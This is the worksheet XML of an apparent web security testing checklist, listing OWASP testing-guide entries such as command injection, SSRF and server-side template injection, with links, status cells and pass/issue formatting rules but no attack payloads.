      <c r="G13" s="12" t="s">
        <v>300</v>
      </c>
      <c r="H13" s="12"/>
      <c r="I13" s="13"/>
      <c r="J13" s="14" t="s">
        <v>16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63.95">
      <c r="A14" s="7" t="s">
        <v>301</v>
      </c>
      <c r="B14" s="27" t="s">
        <v>302</v>
      </c>
      <c r="C14" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection", "Testing for IMAP SMTP Injection")</f>
        <v>Testing for IMAP SMTP Injection</v>
      </c>
      <c r="D14" s="53" t="s">
        <v>303</v>
      </c>
      <c r="E14" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F14" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G14" s="12" t="s">
        <v>304</v>
      </c>
      <c r="H14" s="12"/>
      <c r="I14" s="13"/>
      <c r="J14" s="14" t="s">
        <v>16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96">
      <c r="A15" s="7" t="s">
        <v>305</v>
      </c>
      <c r="B15" s="27" t="s">
        <v>306</v>
      </c>
      <c r="C15" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection", "Testing for Code Injection")</f>
        <v>Testing for Code Injection</v>
      </c>
      <c r="D15" s="53" t="s">
        <v>307</v>
      </c>
      <c r="E15" s="11" t="s">
        <v>308</v>
      </c>
      <c r="F15" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G15" s="12" t="s">
        <v>309</v>
      </c>
      <c r="H15" s="12"/>
      <c r="I15" s="13"/>
      <c r="J15" s="14" t="s"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2.1">
      <c r="A16" s="7" t="s">
        <v>310</v>
      </c>
      <c r="B16" s="27" t="s">
        <v>311</v>
      </c>
      <c r="C16" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection", "Testing for Command Injection")</f>
        <v>Testing for Command Injection</v>
      </c>
      <c r="D16" s="53" t="s">
        <v>312</v>
      </c>
      <c r="E16" s="11" t="s">
        <v>313</v>
      </c>
      <c r="F16" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G16" s="12" t="s">
        <v>314</v>
      </c>
      <c r="H16" s="12"/>
      <c r="I16" s="13"/>
      <c r="J16" s="14" t="s"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8">
      <c r="A17" s="7" t="s">
        <v>315</v>
      </c>
      <c r="B17" s="27" t="s">
        <v>316</v>
      </c>
      <c r="C17" s="57" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection", "Testing for Format String Injection")</f>
        <v>Testing for Format String Injection</v>
      </c>
      <c r="D17" s="53" t="s">
        <v>317</v>
      </c>
      <c r="E17" s="11" t="s">
        <v>318</v>
      </c>
      <c r="F17" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G17" s="12" t="s">
        <v>319</v>
      </c>
      <c r="H17" s="12"/>
      <c r="I17" s="13"/>
      <c r="J17" s="14" t="s">
        <v>16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63.95">
      <c r="A18" s="7" t="s">
        <v>320</v>
      </c>
      <c r="B18" s="27" t="s">
        <v>321</v>
      </c>
      <c r="C18" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability", "Testing for Incubated Vulnerability")</f>
        <v>Testing for Incubated Vulnerability</v>
      </c>
      <c r="D18" s="53" t="s">
        <v>322</v>
      </c>
      <c r="E18" s="11" t="s">
        <v>323</v>
      </c>
      <c r="F18" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G18" s="12" t="s">
        <v>324</v>
      </c>
      <c r="H18" s="12"/>
      <c r="I18" s="13"/>
      <c r="J18" s="14" t="s">
        <v>16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63.95">
      <c r="A19" s="7" t="s">
        <v>325</v>
      </c>
      <c r="B19" s="27" t="s">
        <v>326</v>
      </c>
      <c r="C19" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling", "Testing for HTTP Splitting Smuggling")</f>
        <v>Testing for HTTP Splitting Smuggling</v>
      </c>
      <c r="D19" s="53" t="s">
        <v>327</v>
      </c>
      <c r="E19" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F19" s="12" t="s">
        <v>328</v>
      </c>
      <c r="G19" s="12" t="s">
        <v>329</v>
      </c>
      <c r="H19" s="12"/>
      <c r="I19" s="13"/>
      <c r="J19" s="14" t="s">
        <v>16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48">
      <c r="A20" s="7" t="s">
        <v>330</v>
      </c>
      <c r="B20" s="27" t="s">
        <v>331</v>
      </c>
      <c r="C20" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests", "Testing for HTTP Incoming Requests")</f>
        <v>Testing for HTTP Incoming Requests</v>
      </c>
      <c r="D20" s="53" t="s">
        <v>332</v>
      </c>
      <c r="E20" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F20" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G20" s="50" t="s">
        <v>15</v>
      </c>
      <c r="H20" s="12"/>
      <c r="I20" s="13"/>
      <c r="J20" s="14" t="s">
        <v>16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32.1">
      <c r="A21" s="7" t="s">
        <v>333</v>
      </c>
      <c r="B21" s="27" t="s">
        <v>334</v>
      </c>
      <c r="C21" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection", "Testing for Host Header Injection")</f>
        <v>Testing for Host Header Injection</v>
      </c>
      <c r="D21" s="53" t="s">
        <v>335</v>
      </c>
      <c r="E21" s="11" t="s">
        <v>336</v>
      </c>
      <c r="F21" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G21" s="12" t="s">
        <v>337</v>
      </c>
      <c r="H21" s="12"/>
      <c r="I21" s="13"/>
      <c r="J21" s="14" t="s">
        <v>16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48">
      <c r="A22" s="7" t="s">
        <v>338</v>
      </c>
      <c r="B22" s="27" t="s">
        <v>339</v>
      </c>
      <c r="C22" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection", "Testing for Server-side Template Injection")</f>
        <v>Testing for Server-side Template Injection</v>
      </c>
      <c r="D22" s="53" t="s">
        <v>340</v>
      </c>
      <c r="E22" s="11" t="s">
        <v>341</v>
      </c>
      <c r="F22" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G22" s="12" t="s">
        <v>342</v>
      </c>
      <c r="H22" s="12"/>
      <c r="I22" s="13"/>
      <c r="J22" s="14" t="s">
        <v>16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8">
      <c r="A23" s="7" t="s">
        <v>343</v>
      </c>
      <c r="B23" s="27" t="s">
        <v>344</v>
      </c>
      <c r="C23" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery", "Testing for Server-Side Request Forgery")</f>
        <v>Testing for Server-Side Request Forgery</v>
      </c>
      <c r="D23" s="53" t="s">
        <v>345</v>
      </c>
      <c r="E23" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F23" s="12" t="s">
        <v>346</v>
      </c>
      <c r="G23" s="12" t="s">
        <v>347</v>
      </c>
      <c r="H23" s="12"/>
      <c r="I23" s="13"/>
      <c r="J23" s="14" t="s">
        <v>16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32.1">
      <c r="A24" s="7" t="s">
        <v>348</v>
      </c>
      <c r="B24" s="27" t="s">
        <v>349</v>
      </c>
      <c r="C24" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment", "Testing for Mass Assignment")</f>
        <v>Testing for Mass Assignment</v>
      </c>
      <c r="D24" s="53" t="s">
        <v>350</v>
      </c>
      <c r="E24" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F24" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G24" s="12" t="s">
        <v>351</v>
      </c>
      <c r="H24" s="12"/>
      <c r="I24" s="13"/>
      <c r="J24" s="14" t="s">
        <v>16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>
      <c r="A27" s="23"/>
      <c r="B27" s="23"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24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95">
      <c r="A28" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B28" s="20"/>
      <c r="C28" s="21"/>
      <c r="D28" s="21"/>
      <c r="E28" s="22"/>
      <c r="F28" s="22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8" ht="15.95">
      <c r="A29" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B29" s="20"/>
      <c r="C29" s="21"/>
      <c r="D29" s="21"/>
      <c r="E29" s="22"/>
      <c r="F29" s="22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8" ht="15.95">
      <c r="A30" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B30" s="20"/>
      <c r="C30" s="21"/>
      <c r="D30" s="21"/>
      <c r="E30" s="22"/>
      <c r="F30" s="22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8" ht="15.95">
      <c r="A31" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B31" s="20"/>
      <c r="C31" s="21"/>
      <c r="D31" s="21"/>
      <c r="E31" s="22"/>
      <c r="F31" s="22"/>
      <c r="G31" s="22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8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>
      <c r="A937" s="19"/>
      <c r="B937" s="20"/>
      <c r="C937" s="21"/>
      <c r="D937" s="21"/>
      <c r="E937" s="19"/>
      <c r="F937" s="19"/>
      <c r="G937" s="19"/>
      <c r="H937" s="22"/>
      <c r="I937" s="22"/>
      <c r="J937" s="2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>
      <c r="A938" s="19"/>
      <c r="B938" s="20"/>
      <c r="C938" s="21"/>
      <c r="D938" s="21"/>
      <c r="E938" s="19"/>
      <c r="F938" s="19"/>
      <c r="G938" s="19"/>
      <c r="H938" s="22"/>
      <c r="I938" s="22"/>
      <c r="J938" s="2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>
      <c r="A939" s="19"/>
      <c r="B939" s="20"/>
      <c r="C939" s="21"/>
      <c r="D939" s="21"/>
      <c r="E939" s="19"/>
      <c r="F939" s="19"/>
      <c r="G939" s="19"/>
      <c r="H939" s="22"/>
      <c r="I939" s="22"/>
      <c r="J939" s="2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>
      <c r="A940" s="19"/>
      <c r="B940" s="20"/>
      <c r="C940" s="21"/>
      <c r="D940" s="21"/>
      <c r="E940" s="19"/>
      <c r="F940" s="19"/>
      <c r="G940" s="19"/>
      <c r="H940" s="22"/>
      <c r="I940" s="22"/>
      <c r="J940" s="2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>
      <c r="A941" s="19"/>
      <c r="B941" s="20"/>
      <c r="C941" s="21"/>
      <c r="D941" s="21"/>
      <c r="E941" s="19"/>
      <c r="F941" s="19"/>
      <c r="G941" s="19"/>
      <c r="H941" s="22"/>
      <c r="I941" s="22"/>
      <c r="J941" s="2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>
      <c r="A942" s="19"/>
      <c r="B942" s="20"/>
      <c r="C942" s="21"/>
      <c r="D942" s="21"/>
      <c r="E942" s="19"/>
      <c r="F942" s="19"/>
      <c r="G942" s="19"/>
      <c r="H942" s="22"/>
      <c r="I942" s="22"/>
      <c r="J942" s="2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>
      <c r="A943" s="19"/>
      <c r="B943" s="20"/>
      <c r="C943" s="21"/>
      <c r="D943" s="21"/>
      <c r="E943" s="19"/>
      <c r="F943" s="19"/>
      <c r="G943" s="19"/>
      <c r="H943" s="22"/>
      <c r="I943" s="22"/>
      <c r="J943" s="2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>
      <c r="A944" s="19"/>
      <c r="B944" s="20"/>
      <c r="C944" s="21"/>
      <c r="D944" s="21"/>
      <c r="E944" s="19"/>
      <c r="F944" s="19"/>
      <c r="G944" s="19"/>
      <c r="H944" s="22"/>
      <c r="I944" s="22"/>
      <c r="J944" s="2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>
      <c r="A945" s="19"/>
      <c r="B945" s="20"/>
      <c r="C945" s="21"/>
      <c r="D945" s="21"/>
      <c r="E945" s="19"/>
      <c r="F945" s="19"/>
      <c r="G945" s="19"/>
      <c r="H945" s="22"/>
      <c r="I945" s="22"/>
      <c r="J945" s="2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>
      <c r="A946" s="19"/>
      <c r="B946" s="20"/>
      <c r="C946" s="21"/>
      <c r="D946" s="21"/>
      <c r="E946" s="19"/>
      <c r="F946" s="19"/>
      <c r="G946" s="19"/>
      <c r="H946" s="22"/>
      <c r="I946" s="22"/>
      <c r="J946" s="2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>
      <c r="A947" s="19"/>
      <c r="B947" s="20"/>
      <c r="C947" s="21"/>
      <c r="D947" s="21"/>
      <c r="E947" s="19"/>
      <c r="F947" s="19"/>
      <c r="G947" s="19"/>
      <c r="H947" s="22"/>
      <c r="I947" s="22"/>
      <c r="J947" s="2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>
      <c r="A948" s="19"/>
      <c r="B948" s="20"/>
      <c r="C948" s="21"/>
      <c r="D948" s="21"/>
      <c r="E948" s="19"/>
      <c r="F948" s="19"/>
      <c r="G948" s="19"/>
      <c r="H948" s="22"/>
      <c r="I948" s="22"/>
      <c r="J948" s="2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>
      <c r="A949" s="19"/>
      <c r="B949" s="20"/>
      <c r="C949" s="21"/>
      <c r="D949" s="21"/>
      <c r="E949" s="19"/>
      <c r="F949" s="19"/>
      <c r="G949" s="19"/>
      <c r="H949" s="22"/>
      <c r="I949" s="22"/>
      <c r="J949" s="2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>
      <c r="A950" s="19"/>
      <c r="B950" s="20"/>
      <c r="C950" s="21"/>
      <c r="D950" s="21"/>
      <c r="E950" s="19"/>
      <c r="F950" s="19"/>
      <c r="G950" s="19"/>
      <c r="H950" s="22"/>
      <c r="I950" s="22"/>
      <c r="J950" s="2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>
      <c r="A951" s="19"/>
      <c r="B951" s="20"/>
      <c r="C951" s="21"/>
      <c r="D951" s="21"/>
      <c r="E951" s="19"/>
      <c r="F951" s="19"/>
      <c r="G951" s="19"/>
      <c r="H951" s="22"/>
      <c r="I951" s="22"/>
      <c r="J951" s="2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>
      <c r="A952" s="19"/>
      <c r="B952" s="20"/>
      <c r="C952" s="21"/>
      <c r="D952" s="21"/>
      <c r="E952" s="19"/>
      <c r="F952" s="19"/>
      <c r="G952" s="19"/>
      <c r="H952" s="22"/>
      <c r="I952" s="22"/>
      <c r="J952" s="2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</sheetData>
  <autoFilter ref="A3:J20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phoneticPr fontId="16" type="noConversion"/>
  <conditionalFormatting sqref="H5:H19">
    <cfRule type="cellIs" dxfId="179" priority="46" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H19">
    <cfRule type="cellIs" dxfId="178" priority="47" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H19">
    <cfRule type="cellIs" dxfId="177" priority="48" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H28:H31 I32:J952 I1:J2 I25:J27 I5:J19">
    <cfRule type="containsText" dxfId="176" priority="49" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H28:H31 I32:J952 I1:J2 I25:J27 I5:J19">
    <cfRule type="containsText" dxfId="175" priority="50" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H28:H31 I32:J952 I1:J2 I25:J27 I5:J19">
    <cfRule type="containsText" dxfId="174" priority="51" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A29">
    <cfRule type="cellIs" dxfId="173" priority="43" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A29">
    <cfRule type="cellIs" dxfId="172" priority="44" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A29">
    <cfRule type="cellIs" dxfId="171" priority="45" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A30">
    <cfRule type="cellIs" dxfId="170" priority="40" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A30">
    <cfRule type="cellIs" dxfId="169" priority="41" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A30">
    <cfRule type="cellIs" dxfId="168" priority="42" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A31">
    <cfRule type="cellIs" dxfId="167" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A31">
    <cfRule type="cellIs" dxfId="166" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A31">
    <cfRule type="cellIs" dxfId="165" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H20">
    <cfRule type="cellIs" dxfId="164" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H20">
    <cfRule type="cellIs" dxfId="163" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H20">
    <cfRule type="cellIs" dxfId="162" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I20:J20">
    <cfRule type="containsText" dxfId="161" priority="34" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I20))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I20:J20">
    <cfRule type="containsText" dxfId="160" priority="35" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I20))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I20:J20">
    <cfRule type="containsText" dxfId="159" priority="36" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I20))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H21">
    <cfRule type="cellIs" dxfId="158" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H21">
    <cfRule type="cellIs" dxfId="157" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H21">
    <cfRule type="cellIs" dxfId="156" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I21:J21">
    <cfRule type="containsText" dxfId="155" priority="28" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I21))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I21:J21">
    <cfRule type="containsText" dxfId="154" priority="29" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I21))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I21:J21">
    <cfRule type="containsText" dxfId="153" priority="30" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I21))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H22">
    <cfRule type="cellIs" dxfId="152" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H22">
    <cfRule type="cellIs" dxfId="151" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H22">
    <cfRule type="cellIs" dxfId="150" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I22:J22">
    <cfRule type="containsText" dxfId="149" priority="22" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I22))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I22:J22">
    <cfRule type="containsText" dxfId="148" priority="23" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I22))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I22:J22">
    <cfRule type="containsText" dxfId="147" priority="24" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I22))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H23">
    <cfRule type="cellIs" dxfId="146" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H23">
    <cfRule type="cellIs" dxfId="145" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H23">
    <cfRule type="cellIs" dxfId="144" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:J23">
    <cfRule type="containsText" dxfId="143" priority="16" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I23))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:J23">
    <cfRule type="containsText" dxfId="142" priority="17" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I23))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:J23">
    <cfRule type="containsText" dxfId="141" priority="18" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I23))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H24">
    <cfRule type="cellIs" dxfId="140" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H24">
    <cfRule type="cellIs" dxfId="139" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H24">
    <cfRule type="cellIs" dxfId="138" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I24:J24">
    <cfRule type="containsText" dxfId="137" priority="4" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I24))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I24:J24">
    <cfRule type="containsText" dxfId="136" priority="5" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I24))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I24:J24">
    <cfRule type="containsText" dxfId="135" priority="6" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I24))))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H24" xr:uid="{F3D250D8-14AA-7744-9EA7-C79391A97293}">
      <formula1>$A$29:$A$31</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A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4540F-1523-CA4B-85AC-27A009706D80}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AC934"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" sqref="A1:K1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51.42578125" style="2" customWidth="1"/>
    <col min="5" max="5" width="62.7109375" style="2" customWidth="1"/>
    <col min="6" max="6" width="12" style="2" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="14.85546875" style="2" customWidth="1"/>
    <col min="8" max="8" width="10" style="2" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="6.28515625" style="2" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="34.28515625" style="2" customWidth="1"/>
    <col min="11" max="11" width="11.28515625" style="2" bestFit="1" customWidth="1"/>
    <col min="12" max="29" width="8.85546875" style="2" customWidth="1"/>
    <col min="30" max="16384" width="14.42578125" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:29" ht="39" customHeight="1">
      <c r="A1" s="87" t="s">
        <v>352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75" customHeight="1">
      <c r="A2" s="3"/>
      <c r="B2" s="4"/>
      <c r="C2" s="5"/>
      <c r="D2" s="5"/>
      <c r="E2" s="3"/>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="3"/>
      <c r="I2" s="6"/>
      <c r="J2" s="6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62</v>
      </c>
      <c r="F3" s="88" t="s">
        <v>5</v>
      </c>
      <c r="G3" s="88" t="s">
        <v>6</v>
      </c>
      <c r="H3" s="88" t="s">
        <v>7</v>
      </c>
      <c r="I3" s="85" t="s">
        <v>8</v>
      </c>
      <c r="J3" s="88" t="s">
        <v>9</v>
      </c>
      <c r="K3" s="88" t="s">
        <v>10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7.100000000000001" customHeight="1">
      <c r="A4" s="86"/>
      <c r="B4" s="88"/>
      <c r="C4" s="88"/>
      <c r="D4" s="88"/>
      <c r="E4" s="88"/>
      <c r="F4" s="88"/>
      <c r="G4" s="88"/>
      <c r="H4" s="88"/>
      <c r="I4" s="86"/>
      <c r="J4" s="88"/>
      <c r="K4" s="8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11.95">
      <c r="A5" s="7" t="s">
        <v>353</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>354</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/01-Testing_For_Improper_Error_Handling", "Testing for Improper Error Handling")</f>
        <v>Testing for Improper Error Handling</v>
      </c>
      <c r="D5" s="53" t="s">
        <v>355</v>
      </c>
      <c r="E5" s="10"/>
      <c r="F5" s="11" t="s">
        <v>44</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>94</v>
      </c>
      <c r="H5" s="12" t="s">
        <v>356</v>
      </c>
      <c r="I5" s="12"/>
      <c r="J5" s="13"/>
      <c r="K5" s="14" t="s">
        <v>16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7.100000000000001">
      <c r="A6" s="7" t="s">
        <v>357</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>358</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/02-Testing_for_Stack_Traces", "Testing for Stack Traces")</f>
        <v>Testing for Stack Traces</v>
      </c>
      <c r="D6" s="58" t="s">
        <v>359</v>
      </c>
      <c r="E6" s="15"/>
      <c r="F6" s="56" t="s">
        <v>15</v>
      </c>
      <c r="G6" s="50" t="s">
        <v>15</v>
      </c>
      <c r="H6" s="50" t="s">
        <v>15</v>
      </c>
      <c r="I6" s="12"/>
      <c r="J6" s="13"/>
      <c r="K6" s="14" t="s">
        <v>16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.75" customHeight="1">
      <c r="A7" s="19"/>
      <c r="B7" s="20"/>
      <c r="C7" s="21"/>
      <c r="D7" s="21"/>
      <c r="E7" s="19"/>
      <c r="F7" s="19"/>
      <c r="G7" s="19"/>
      <c r="H7" s="19"/>
      <c r="I7" s="22"/>
      <c r="J7" s="22"/>
      <c r="K7" s="2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.75" customHeight="1">
      <c r="A8" s="19"/>
      <c r="B8" s="20"/>
      <c r="C8" s="21"/>
      <c r="D8" s="21"/>
      <c r="E8" s="19"/>
      <c r="F8" s="19"/>
      <c r="G8" s="19"/>
      <c r="H8" s="19"/>
      <c r="I8" s="22"/>
      <c r="J8" s="22"/>
      <c r="K8" s="2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.75" customHeight="1">
      <c r="A9" s="23"/>
      <c r="B9" s="23"/>
      <c r="C9" s="24"/>
      <c r="D9" s="24"/>
      <c r="E9" s="19"/>
      <c r="F9" s="19"/>
      <c r="G9" s="19"/>
      <c r="H9" s="19"/>
      <c r="I9" s="22"/>
      <c r="J9" s="22"/>
      <c r="K9" s="2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95">
      <c r="A10" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B10" s="20"/>
      <c r="C10" s="21"/>
      <c r="D10" s="21"/>
      <c r="E10" s="22"/>
      <c r="F10" s="22"/>
      <c r="G10" s="22"/>
      <c r="H10" s="22"/>
      <c r="I10" s="22"/>
      <c r="J10" s="22"/>
      <c r="K10" s="2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15.95" customHeight="1">
      <c r="A11" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B11" s="20"/>
      <c r="C11" s="21"/>
      <c r="D11" s="21"/>
      <c r="E11" s="22"/>
      <c r="F11" s="22"/>
      <c r="G11" s="22"/>
      <c r="H11" s="22"/>
      <c r="I11" s="22"/>
      <c r="J11" s="22"/>
      <c r="K11" s="2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5.95" customHeight="1">
      <c r="A12" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B12" s="20"/>
      <c r="C12" s="21"/>
      <c r="D12" s="21"/>
      <c r="E12" s="22"/>
      <c r="F12" s="22"/>
      <c r="G12" s="22"/>
      <c r="H12" s="22"/>
      <c r="I12" s="22"/>
      <c r="J12" s="22"/>
      <c r="K12" s="2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5.95" customHeight="1">
      <c r="A13" s="12" t="s">
        <v>60</v>
      </c>
